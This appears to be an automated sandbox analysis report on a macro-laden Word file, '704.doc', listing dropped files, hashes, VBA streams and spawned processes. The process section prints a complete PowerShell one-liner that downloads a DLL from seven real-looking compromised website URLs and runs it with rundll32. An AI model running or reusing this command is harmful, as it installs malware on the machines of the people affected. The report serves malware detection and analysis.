      SHA-512:C50363E3CA99B4537A8BA625D84CD0A8C2E8FB15D1FF0163E967D3536E373F3449EB4489EC117766D78B1386D60192453FAE8C372119E32D98E58B07844216EB
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: .PNG........IHDR...g.........&.......sRGB.........IDATx^..`....^..K.,[.w..tB..Hh.B......B.IH.4z3....1.\q..z?..m...=.d.P....".........7...]g..!I...`.o.@.. .D...."@.... .D`.%`.......]......T.1.4.A..@8.|....."@.... .D...."...0...".'.CS...7.......jn..TM..~(..!........."@.... .D....".....0.C.$..y.....(^..IK.z...VM.&...G:.) .AV5v...!...`.."H.`.....C.'.%.3w--..>.I..."@.... .D...."..#..R.d..&L[3...5.zj.{/...5..u.C...; .P,.xY.T.4%=...!:$.)..)..#..[>..F.zD.... .D...."@........D.k.0v......t3..w..66.+.d........+....K.....G.=,H.Ur..x..2E. ...O"...:.g.Le...;...O..qw....n...$*...."@.... .D.....J #B.|M.qS.M<..5......j.e.O.!vL.qa.)*D.$).d.."...v..{....:..,.vy.._.k...:#...&........2.p>^,.g.b...a7....C...N....+..ke.g&#.r...Q)D...."@.... .D...+..U.....'.f..P5..=[#q.a.G...W.VF.Y.e..e=.km......]2.7rh.C..u...d.Ru..;c.;.V....*..:^]..5CQ.W....&..$..|.J2.....V4{.U..i....py.t.....,.....+..U.r+..0..R\.s....NB..$#.....~....R".....k..{.... .D....".W.dD.q.1m..-......E4<t..}
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:Composite Document File V2 Document, Cannot read section info
      Category:dropped
      Size (bytes):41984
      Entropy (8bit):5.396502435833668
      Encrypted:false
      SSDEEP:768:QoV2gfCYtBMnkyXpua8HfxV2gfCgtBMnkyXpua8H:Y6N7MkVhHG6B7MkVhH
      MD5:CE9E5A2954866976632E497655B1882B
      SHA1:D1518E3C3269FD2E6512D6045A463CBE09211E99
      SHA-256:75A2A12D357329BB6C6CAC8730CDA50728B0A37B53DEE4D585F00F235607E45E
      SHA-512:19E743670CB5B16DEE433A19EB0EBD9A31D6D36C28AF9C5944C1CD8645EF278CF07F3812B674415D67EAB4DAEAB71F0F442E63D4631E9472614F66AE2C02C144
      Malicious:false
      Reputation:low
      Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................(...*...........................................................................................................................................)...+...6...O...........................................,...................................................................................................P...........................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{58F32F91-EE55-4449-B0B3-F02D5B2E95D2}.tmp
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):1024
      Entropy (8bit):0.05390218305374581
      Encrypted:false
      SSDEEP:3:ol3lYdn:4Wn
      MD5:5D4D94EE7E06BBB0AF9584119797B23A
      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
      Malicious:false
      Reputation:high, very likely benign file
      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8907FAB7-1F61-4790-AB28-47403D75A993}.tmp
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):2
      Entropy (8bit):1.0
      Encrypted:false
      SSDEEP:3:X:X
      MD5:32649384730B2D61C9E79D46DE589115
      SHA1:053D8D6CEEBA9453C97D0EE5374DB863E6F77AD4
      SHA-256:E545D395BB3FD971F91BF9A2B6722831DF704EFAE6C1AA9DA0989ED0970B77BB
      SHA-512:A4944ADFCB670ECD1A320FF126E7DBC7FC8CC4D5E73696D43C404E1C9BB5F228CF8A6EC1E9B1820709AD6D4D28093B7020B1B2578FDBC764287F86F888C07D9C
      Malicious:false
      Reputation:high, very likely benign file
      Preview: ..
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EB899D35-EEB1-4849-9BF6-6658C3435874}.tmp
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):1536
      Entropy (8bit):3.1478370528780375
      Encrypted:false
      SSDEEP:24:HfCemjup6uKTHuJPkTQXaHINvhSBxD+aoF:TKTOJuymfO
      MD5:582FA24D082E9486E72A1B9681CDF97B
      SHA1:CB23EE4B0A2D6188A7C39562DB5B4AA8A9C4FBB9
      SHA-256:F857A260E9DC18D6B5A51207FAC4F1A8A985840E8132CCFB324DEAC36DF67145
      SHA-512:48BDDEC49E6DDE25F4BC3D28C2A8D33E7382022226DF0A836044EB1A3E69FA5A46712AE301BF478C23F686297EB5E9BD9AE2C7A29F03628706CE69BA9E08EDCA
      Malicious:false
      Reputation:low
      Preview: ../... ... . ... ... ..... . ... ... . ..... . ....... ... ..... ......... . . ... . ... ... . . ............. . ....... ... ............... ... ......... ......... . . ....... . ..... . . ... ... ... . .....................................................................................................................................................................................................................................................................................................................................@...H...\...f...h...|................................................................................................................................................................................................................................................................................................................................................L.......\. ............gd|b..........).Y...gd..T.............gd|H...............L.......\. ............gd..T.......
      C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):147284
      Entropy (8bit):4.421579591711272
      Encrypted:false
      SSDEEP:1536:C8HL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcmB:CkJNSc83tKBAvQVCgOtmXmLpLmB
      MD5:4E827FA2947FDADD8926FF58D42BC7E9
      SHA1:65C90AB768A1D7FBABB6F1C719110DA6FD5D9B12
      SHA-256:5CD589A641061016C526FCB4220895E8A323BB7DCC27FC6C540A9BA594A7750B
      SHA-512:3D23844999CC2DC772141B7071760A318495D9008B929229F6BDC7CDFC3AFD2B532FD39863BBAFA122C566B908E0917A7DCA0AD5D063BAE9FDDFCB1BDB2F9653
      Malicious:false
      Reputation:low
      Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8...........N..............\W...............J..............,<...............<..............xW..............xY..xG.............T...........D...............................T...............................................................&!..d...........................................................................................
      C:\Users\user\AppData\Local\Temp\~DF59F33552EDE7EF7C.TMP
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:Composite Document File V2 Document, Cannot read section info
      Category:dropped
      Size (bytes):57856
      Entropy (8bit):4.701644950261556
      Encrypted:false
      SSDEEP:768:gkvd/MFp4Zgj+KmkyGhAQhQw4vwQAYYyWWwgekrrozS6X+W:HM/j1xXhQmkrrozS6OW
      MD5:3AD53E44E66D3E083F7DF8F643C4CA3E
      SHA1:44B4AB308D072BADDFD8C7138508F11A4FB0F9BF
      SHA-256:1CE1F8D3E16D8DB7F0B001101283CD500B3DC59073AD01400D18E6BF4F6AFCFA
      SHA-512:480174C894799065B0F1C86A1CCE51BAAE26951667DF232FFE399A7B761D0022C4DF8620D08B32C3EDF18806F2E56D8E96081E3D762235BF9092A953E03ACB53
      Malicious:true
      Yara Hits:
      • Rule: SUSP_VBA_FileSystem_Access, Description: Detects suspicious VBA that writes to disk and is activated on document open, Source: C:\Users\user\AppData\Local\Temp\~DF59F33552EDE7EF7C.TMP, Author: Florian Roth
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      Preview: ......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................J....................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7.......9...:...;...<...=...F...?...@...A...B...C...D...E...8...G...H...I.......l...L...M...N...S...P...Q...R.......m...]...V...W...X...Y...Z...[...\...O...^..._...`...a...j...c...d...e...f...g...h...i...T...k...........n...o...............................................
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\704.LNK
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:59 2021, mtime=Mon Aug 30 20:08:59 2021, atime=Mon Nov 22 20:15:18 2021, length=136531, window=hide
      Category:dropped
      Size (bytes):973
      Entropy (8bit):4.501036887264172
      Encrypted:false
      SSDEEP:12:8n2wfq0gXg/XAlCPCHaXvB4XB/a/X+W6Dp2nEicvbIX8vs5DtZ3YilMMEpxRljKN:8HP/XT/4Imp2nveE0s5Dv3q3Qd7Qy
      MD5:0014D6DE553BD69E527052AF58AC3A74
      SHA1:B61ADCFD29FD6F5BE647FAB62F82B4D2B319C22D
      SHA-256:CC1F9F876CB4A4CF9838CE5FB0B9DF6ED8F1A16A2AB387694CD5CA1DC52A714B
      SHA-512:6FD6626E49D1D9B86B20CB21C1D024FB79E4C0C1ED9E3E688A6F63B0EA235C15BAAB38E6E46D7A3DB24BB7570B3DEBF8BDE5A78DF3D1316DDB250609384F563F
      Malicious:false
      Preview: L..................F.... .....U@.....U@....Y&.....S............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S!...user.8......QK.X.S!.*...&=....U...............A.l.b.u.s.....z.1......S"...Desktop.d......QK.X.S".*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....R.2.S...vS. .704.doc.<.......S ..S .*.........................7.0.4...d.o.c.......q...............-...8...[............?J......C:\Users\..#...................\\414408\Users.user\Desktop\704.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.7.0.4...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......414408..........D_....3N...W...9..g............[D_....3N...W...9..g............[....
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):57
      Entropy (8bit):4.440640076685947
      Encrypted:false
      SSDEEP:3:bDuMJl+VomX1SVtBVov:bCJaV9y
      MD5:2B1A3D4E9531BB7AAAEEE91097C6E6C8
      SHA1:CDCB8BB8DF9FDC8AE6C9B4E7B3FA485B8075C74B
      SHA-256:7C5B1F305E5CDABE223B67B449800F306C63D8B354CA4A21F1C8C20E909EC8E1
      SHA-512:B2ED8A04808A83A548F91A0CFA5B3D830A05EB52D6B4F436B02D3ADDF1A020DBE04252F19E778E706827A16CBB7E3ECED7BBD8E82E69096A1328E2BEFA478374
      Malicious:false
      Preview: [folders]..Templates.LNK=0..704.LNK=0..[doc]..704.LNK=0..
      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.5038355507075254
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
      MD5:45B1E2B14BE6C1EFC217DCE28709F72D
      SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
      SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
      SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
      Malicious:false
      Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy)
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:dropped
      Size (bytes):8016
      Entropy (8bit):3.58293275849656
      Encrypted:false
      SSDEEP:96:chQCcMqGqvsqvJCwo5z8hQCcMqGqvsEHyqvJCworXzIyYDH6F2htlUVjA2:ci7o5z8ivHnorXzIoF2hCA2
      MD5:8F22547DE16012FD240D42D18B0C5959
      SHA1:0B61D0A635BC93922E916B17EC50B9360EB3B752
      SHA-256:7CD9D5910D7CD1976ABC501A7115AB590611E139043382C83574ADE07AF79921
      SHA-512:04229BA1E0EDEDD2D729F1E27D2222F30AB613CAAE2F196C547EFC6AE2C5F59BE15D9BCADBCFCEA45155FCEA89ED2EA99A22073A36EE0FDD4D05D0F842AF8415
      Malicious:false
      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J29WGVF1UDYP81V0IINR.temp
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:dropped
      Size (bytes):8016
      Entropy (8bit):3.58293275849656
      Encrypted:false
      SSDEEP:96:chQCcMqGqvsqvJCwo5z8hQCcMqGqvsEHyqvJCworXzIyYDH6F2htlUVjA2:ci7o5z8ivHnorXzIoF2hCA2
      MD5:8F22547DE16012FD240D42D18B0C5959
      SHA1:0B61D0A635BC93922E916B17EC50B9360EB3B752
      SHA-256:7CD9D5910D7CD1976ABC501A7115AB590611E139043382C83574ADE07AF79921
      SHA-512:04229BA1E0EDEDD2D729F1E27D2222F30AB613CAAE2F196C547EFC6AE2C5F59BE15D9BCADBCFCEA45155FCEA89ED2EA99A22073A36EE0FDD4D05D0F842AF8415
      Malicious:false
      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
      C:\Users\user\Desktop\~$704.doc
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.5038355507075254
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
      MD5:45B1E2B14BE6C1EFC217DCE28709F72D
      SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
      SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
      SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
      Malicious:true
      Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

      Static File Info

      General

      File type:Microsoft Word 2007+
      Entropy (8bit):7.953888666040384
      TrID:
      • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
      • Word Microsoft Office Open XML Format document (49504/1) 32.35%
      • Word Microsoft Office Open XML Format document (43504/1) 28.43%
      • ZIP compressed archive (8000/1) 5.23%
      File name:704.doc
      File size:146367
      MD5:40f85d07da2533d576b1f2d7c043a2da
      SHA1:60b84d70a6511483c6de131fb62e30a99edff5c4
      SHA256:d05ec2a0134518ec74fcbee94a522c3837d82b7b5d2f162b8466850fc4f1be0d
      SHA512:fb718ea1a81fdcba7c933cd55a54beeee660a7e4d5b0a1e1ee11351e40cc691dd3fb644dce60335dfea9c983fc5a4ce079b2a3349fb26c77c444c66cada454a2
      SSDEEP:3072:hAGj2SXwhJd0+y7ukYe4uYum1GdgOpVXGuhCUqDve/Nk:9CSXw50+OukzVXV2uhDCG/Nk
      File Content Preview:PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

      File Icon

      Icon Hash:e4eea2aaa4b4b4a4

      Static OLE Info

      General

      Document Type:OpenXML
      Number of OLE Files:1

      OLE File "/opt/package/joesandbox/database/analysis/526268/sample/704.doc"

      Indicators

      Has Summary Info:False
      Application Name:unknown
      Encrypted Document:False
      Contains Word Document Stream:
      Contains Workbook/Book Stream:
      Contains PowerPoint Document Stream:
      Contains Visio Document Stream:
      Contains ObjectPool Stream:
      Flash Objects Count:
      Contains VBA Macros:True

      Summary

      Author:1
      Template:Normal.dotm
      Last Saved By:1
      Revion Number:103
      Total Edit Time:211
      Create Time:2021-11-15T15:39:00Z
      Last Saved Time:2021-11-18T19:09:00Z
      Number of Pages:1
      Number of Words:16
      Number of Characters:95
      Creating Application:Microsoft Office Word
      Security:0

      Document Summary

      Number of Lines:1
      Number of Paragraphs:1
      Thumbnail Scaling Desired:false
      Company:
      Contains Dirty Links:false
      Shared Document:false
      Changed Hyperlinks:false
      Application Version:12.0000

      Streams with VBA

      VBA File Name: cvbku3gakuisdgfilu3gblaw.cls, Stream Size: 10382
      General
      Stream Path:VBA/cvbku3gakuisdgfilu3gblaw
      VBA File Name:cvbku3gakuisdgfilu3gblaw.cls
      Stream Size:10382
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ? . . . . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 01 00 00 f0 00 00 00 9e 08 00 00 d4 00 00 00 02 02 00 00 ff ff ff ff a7 08 00 00 3f 1b 00 00 00 00 00 00 01 00 00 00 ea eb ff 49 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code

      Streams

      Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 519
      General
      Stream Path:PROJECT
      File Type:ASCII text, with CRLF line terminators
      Stream Size:519
      Entropy:5.27637957879
      Base64 Encoded:True
      Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = c v b k u 3 g a k u i s d g f i l u 3 g b l a w / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . H e l p F i l e = " " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4 6 4 4 E A B 6 7 6 B A B 8 B E B 8 B E B C C 2 B C C 2 " . .
      Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 63 76 62 6b 75 33 67 61 6b 75 69 73 64 67 66 69 6c 75 33 67 62 6c 61 77 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41
      Stream Path: PROJECTwm, File Type: data, Stream Size: 77
      General
      Stream Path:PROJECTwm
      File Type:data
      Stream Size:77
      Entropy:3.2550852567
      Base64 Encoded:False
      Data ASCII:c v b k u 3 g a k u i s d g f i l u 3 g b l a w . c . v . b . k . u . 3 . g . a . k . u . i . s . d . g . f . i . l . u . 3 . g . b . l . a . w . . . . .
      Data Raw:63 76 62 6b 75 33 67 61 6b 75 69 73 64 67 66 69 6c 75 33 67 62 6c 61 77 00 63 00 76 00 62 00 6b 00 75 00 33 00 67 00 61 00 6b 00 75 00 69 00 73 00 64 00 67 00 66 00 69 00 6c 00 75 00 33 00 67 00 62 00 6c 00 61 00 77 00 00 00 00 00
      Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4731
      General
      Stream Path:VBA/_VBA_PROJECT
      File Type:data
      Stream Size:4731
      Entropy:4.84395391101
      Base64 Encoded:False
      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
      Data Raw:cc 61 88 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 07 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
      Stream Path: VBA/dir, File Type: data, Stream Size: 843
      General
      Stream Path:VBA/dir
      File Type:data
      Stream Size:843
      Entropy:6.51963251442
      Base64 Encoded:True
      Data ASCII:. G . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . i . c . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . . N c .
      Data Raw:01 47 b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 1a 69 8e 63 07 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

      Network Behavior

      No network behavior found

      Code Manipulations

      Statistics

      Behavior

      Click to jump to process

      System Behavior

      Analysis Process: WINWORD.EXE PID: 1220 Parent PID: 596

      General

      Start time:13:15:18
      Start date:22/11/2021
      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
      Imagebase:0x13f820000
      File size:1423704 bytes
      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Analysis Process: cmd.exe PID: 2420 Parent PID: 1220

      General

      Start time:13:15:23
      Start date:22/11/2021
      Path:C:\Windows\System32\cmd.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
      Imagebase:0x4ace0000
      File size:345088 bytes
      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Analysis Process: powershell.exe PID: 2776 Parent PID: 2420

      General

      Start time:13:15:24
      Start date:22/11/2021
      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):false
      Commandline:powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
      Imagebase:0x13ff00000
      File size:473600 bytes
      MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Reputation:high

      Disassembly

      Code Analysis

      Reset < >